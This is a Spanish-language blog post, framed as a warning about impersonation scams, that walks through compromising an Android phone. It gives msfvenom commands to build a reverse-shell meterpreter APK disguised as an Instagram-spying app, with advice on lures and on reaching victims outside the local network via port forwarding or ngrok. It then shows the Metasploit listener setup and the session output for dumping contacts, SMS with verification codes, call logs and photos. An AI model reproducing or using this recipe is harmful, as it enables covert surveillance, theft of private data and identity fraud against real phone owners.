Hace poco me llegaron unos mensajes de un número desconocido pero la foto de perfil era de una persona que sí conozco. Me pareció sospechoso pues no es alguien con quien tenga contacto así que le pedí que me enviara una nota de voz. Eso bastó para que ese pobre diablo dejara de escribirme. Un caso típico de suplantación de identidad.
El libreto casi siempre es el mismo: «necesito un favor urgente», «es que envié una mudanza con un dinero», «ayúdame please que me bloquearon la cuenta» y un largo etcétera de pendejadas en las que algunos siguen cayendo a pesar de tanta información que hay. Todos estamos familiarizados con esas idioteces porque, o bien nos han pasado, o le han pasado a algunos de nuestros allegados.
Sin embargo, pocos saben cómo es que los delincuentes logran hacerse con los contactos de una persona para suplantarla y estafarlos. Es decir, es fácil conocer los contactos de una persona en las redes sociales pues están a la vista, en los likes o en los comentarios pero, ¿cómo consiguen los contactos del teléfono de alguien para hacer la suplantación de identidad?
Eso tampoco es tan difícil. Basta saber manejar algunas aplicaciones de ciberseguridad y después usar sobre el objetivo un poco de ingeniería social. Al final el ciberdelincuente lanza el ataque pero es el usuario quien lo acepta por confianza, por inocencia o por simple estolidez.
MSFvenom & Metasploit.
Para este ejercicio de suplantación de identidad utilizaré las herramientas MSFvenom y Metasploit que vienen por defecto en el sistema Kali Linux. La primera es parte de la segunda. Con MSFvenom crearemos el payload (la carga útil) y con Metasploit nos conectaremos al dispositivo atacado para extraer la información del usuario como sus contactos, sus fotos, su registro de llamadas, sus mensajes SMS y un poco más.
| 💡 OJO: el ejercició lo haré dentro de una red local. Para atacar un dispositivo externo tendremos que configurar el port forwarding en nuestro router o crear un túnel hacia nuestra máquina con herramientas como ngrok. |
Para el caso utilizaré un teléfono Android de pruebas al cual le cargué previamente un archivo .csv con un poco más de 400 contactos (que dicho sea de paso no conozco). Sin más, comencemos.
Creando la .apk con MSFvenom.
En nuestra terminal de comandos lanzamos la aplicación con el comando msfvenom -h. Allí veremos todas las opciones que nos brinda. Para el caso usaremos la opción -p que crea el payload. El comando quedaría así:
msfvenom -p android/meterpreter/reverse_tcp LHOST=<La-IP-Atacante> LPORT=4444 -o nombre-de-la.apk donde:
- -p android/meterpreter/reverse_tcp: Define el payload. En este caso es una sesión de Meterpreter para Android que usa una conexión TCP inversa.
- LHOST=<IP>: Es la dirección IP de la máquina atacante. Si no lo sabe puede buscarla con el comando:
ip addr show. - LPORT=<Tu-Puerto>: Es el puerto de su máquina que escuchará la conexión.
- -o nombre-de-la.apk: Es el nombre del archivo que enviaremos a la víctima. Aquí es donde entra la ingeniería social.
Para el ejercicio creé un archivo llamado instahack.apk que sirve, supuestamente, para espiar cuentas de Instagram y toda esa mierda patética que hace la gente. Mi comando final quedó así:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.23 LPORT=4444 -o instahack.apk
En nuestro directorio local ya debemos tener el archivo instahack.apk. Esa aplicación es la que debemos enviar a la(s) víctima(s). Aquí entra en juego la narrativa que se le ponga al ataque. Puede tratarse de un supuesto juego, de una herramienta para espiar a otros o de una app de citas. Pueden ser mil cosas.
Se sorprenderían de la cantidad de personas que voluntariamente descargan esas tonterías y, peór aún, de los centenares de miles que las reciben y las abren sin prestar atención a lo que están haciendo. Allá ellos.
Escuchando con Metasploit.
Ahora usaremos Metasploit Framework para establecer conexión con la máquina atacada en el puerto predefinido en el payload (para este caso el 4444). Siga en orden los pasos a continuación y no debería tener problemas.
msfconsole # Lanza Metasploit. use multi/handler # Selecciona el manejador genérico set payload android/meterpreter/reverse_tcp # Configura el mismo payload del .apk set LHOST <su IP> # Configura su IP (la misma que en msfvenom) set LPORT 4444 # Configura su puerto (el mismo que en msfvenom) exploit # Se pone en escucha
Si todo salió bien, una vez se ponga en escucha en su terminal debería verse:
msf exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.1.23:4444 [*] Sending stage (72424 bytes) to 192.168.1.56 [*] Meterpreter session 1 opened (192.168.1.23:4444 -> 192.168.1.56:56116) at 2025-11-17 08:21:27 -0500
Evidentemente estamos dentro del equipo víctima. Ahora podemos ver la información de la máquina remota con el comando sysinfo.
meterpreter > sysinfo Computer : localhost OS : Android 10 - Linux 4.4.177-22371317 (aarch64) Architecture : aarch64 System Language : es_US Meterpreter : dalvik/android
Ahora podemos usar todas las opciones que nos da la conexión establecida. Para el caso de exfiltrar información del equipo son:
Android Commands ================ Command Description ------- ----------- activity_start | Start an Android activity from a Uri string check_root | Check if device is rooted dump_calllog | Get call log dump_contacts | Get contacts list dump_sms | Get sms messages geolocate | Get current lat-long using geolocation hide_app_icon | Hide the app icon from the launcher interval_collect | Manage interval collection capabilities send_sms | Sends SMS from target session set_audio_mode | Set Ringer Mode sqlite_query | Query a SQLite database from storage wakelock | Enable/Disable Wakelock wlan_geolocate | Get current lat-long using WLAN information
Comencemos por descargar toda la lista de contactos de la víctima con el comando dump_contacts. Ojo, si el equipo tiene muchos contactos, como en este caso, tal vez sea necesario aumentar el timeout por defecto de 15 segundos. Para ello debemos hacer lo siguiente:
background # Vamos un paso atrás sin cerrar la sesión sessions # Lista las sesiones abiertas con su ID sessions --interact 1 --timeout 120 # Cambiamos los 15 segundos por defecto por 120
Ahora al darle la orden dump_contacts la herramienta tendrá tiempo de exfiltrar todos los contactos del teléfono atacado. Una vez los extraiga veremos algo así:
meterpreter > dump_contacts [*] Fetching 435 contacts into list [*] Contacts list saved to: contacts_dump_20251817082830.txt meterpreter >
En nuestro directorio local tendremos un archivo .txt con todos los contactos del teléfono. En el siguiente video podemos ver una pequeña parte del archivo que descargamos:
Si queremos descargar los mensajes de texto que ha recibido la persona usaremos la orden: dump_sms y obtendremos todos los SMS en un archivo de texto como se aprecia en la siguiente imagen:
En los SMS hay siempre mucha información pues los usamos para confirmar compras, acceder a cuentas con códigos de verificación (como en la imagen) y mil cosas más. Ya no nos comunicamos con otros por SMS pero las empresas sí se comunican con nosotros así.
Lo siguiente será descargar el registro de llamadas hechas y recibidas por esa persona. Para ello usaremos el comando dump_calllog. Al igual que en el caso anterior, se descargará a nuestra máquina un archivo .txt con la información de llamadas entrantes, salientes, su duración y las llamadas perdidas. Esto es muy útil para establecer los vínculos más cercanos del objetivo:
Ahora buscaremos las imágenes y videos que la persona tiene guardados en su galería. Para ello debemos movernos al directorio adecuado que para el caso es cd /sdcard/DCIM. Es decir, me traslado a la tarjeta de memoria externa y dentro de ella voy al directorio DCIM que significa Digital Camera Images. Allí me aparecerán los directorios que tenga el usuario. Entro a cualquiera de ellos con cd, listo su contenido con ls y estaré viendo los archivos de imagen y video de esa persona:
Esta es solo una de las muchas formas que tienen los delincuentes para robar nuestra información y suplantarnos. Para el caso del ejemplo, el atacante accedió a todos nuestros contactos, a nuestros mensajes, a nuestras llamadas y a nuestras fotos. Ya puede hacerse pasar por nosotros y muchas personas le creerán.
Para alguien familiarizado con la tecnología y la seguridad informática puede parecer tonto descargar o instalar una .apk desconocida pero no es así para las personas con pocos conocimientos en la materia. Todos los días se presentan millones de ataques exitosos. Hay toda una industria delictiva dedicada a ello y no existiría si no tuviera una tasa de éxito redituable.
Sobra decir que en Internet no debemos confiar ni en la madre pues ella también puede haber sido suplantada. Espero les sirva para protegerse. Hasta la próxima.
